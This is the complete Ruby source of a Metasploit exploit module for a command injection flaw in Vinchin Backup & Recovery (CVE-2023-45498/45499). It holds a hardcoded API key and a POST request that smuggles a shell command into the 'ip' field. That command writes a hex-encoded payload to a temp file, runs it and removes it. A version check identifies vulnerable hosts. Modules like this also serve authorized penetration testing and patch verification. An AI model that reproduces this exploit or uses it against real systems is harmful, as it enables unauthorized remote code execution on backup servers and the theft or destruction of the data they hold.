Vinchin Backup And Recovery Command Injection Exploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Vinchin Backup and Recovery Command Injection',
        'Description' => %q{
          This module exploits a command injection vulnerability in Vinchin Backup & Recovery
          v5.0.*, v6.0.*, v6.7.*, and v7.0.*. Due to insufficient input validation in the
          checkIpExists API endpoint, an attacker can execute arbitrary commands as the
          web server user.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Gregory Boddin (LeakIX)', # Vulnerability discovery
          'Valentin Lobstein' # Metasploit module
        ],
        'References' => [
          ['CVE', '2023-45498'],
          ['CVE', '2023-45499'],
          ['URL', 'https://blog.leakix.net/2023/10/vinchin-backup-rce-chain/'],
          ['URL', 'https://vinchin.com/'] # Vendor URL
        ],
        'DisclosureDate' => '2023-10-26',
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ IOC_IN_LOGS ],
          'Reliability' => [ REPEATABLE_SESSION ],
          'AKA' => ['Vinchin Command Injection']
        },
        'Platform' => ['linux', 'unix'],
        'Arch' => [ARCH_CMD],
        'Targets' => [
          ['Automatic', {}]
        ],

        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => true,
          'FETCH_WRITABLE_DIR' => '/usr/share/nginx/vinchin/tmp'
        },
        'Privileged' => false
      )
    )
    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'The base path to the Vinchin Backup & Recovery application', '/']),
        OptString.new('APIKEY', [true, 'The hardcoded API key', '6e24cc40bfdb6963c04a4f1983c8af71']),
      ]
    )
  end

  def exploit
    hex_encoded_payload = payload.encoded.unpack('H*').first
    formatted_payload = hex_encoded_payload.scan(/../).map { |x| "\\\\x#{x}" }.join

    temp_file = "#{datastore['FETCH_WRITABLE_DIR']}/#{Rex::Text.rand_text_alpha(8)}"
    command = "echo -e #{formatted_payload}|tee #{temp_file};chmod 777 #{temp_file};#{temp_file};rm #{temp_file}"
    send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(datastore['TARGETURI'], 'api/'),
      'vars_get' => {
        'm' => '30',
        'f' => 'checkIpExists',
        'k' => datastore['APIKEY']
      },
      'data' => "p={\"ip\":\"a||#{command}\"}"
    })
  end

  def check
    target_uri_path = normalize_uri(target_uri.path, 'login.php')
    res = send_request_cgi('uri' => target_uri_path)

    return CheckCode::Unknown('Failed to connect to the target.') unless res
    return CheckCode::Unknown("Unexpected HTTP response code: #{res.code}") unless res.code == 200

    version_pattern = /Vinchin build: (\d+\.\d+\.\d+\.\d+)/
    version_match = res.body.match(version_pattern)

    unless version_match && version_match[1]
      return CheckCode::Unknown('Unable to extract version.')
    end

    version = Rex::Version.new(version_match[1])
    print_status("Detected Vinchin version: #{version}")

    if (version >= Rex::Version.new('5.0.0') && version < Rex::Version.new('5.1.0')) ||
       (version >= Rex::Version.new('6.0.0') && version < Rex::Version.new('6.1.0')) ||
       (version >= Rex::Version.new('6.7.0') && version < Rex::Version.new('6.8.0')) ||
       (version >= Rex::Version.new('7.0.0') && version < Rex::Version.new('7.0.2'))
      return CheckCode::Appears
    else
      return CheckCode::Safe
    end
  end
end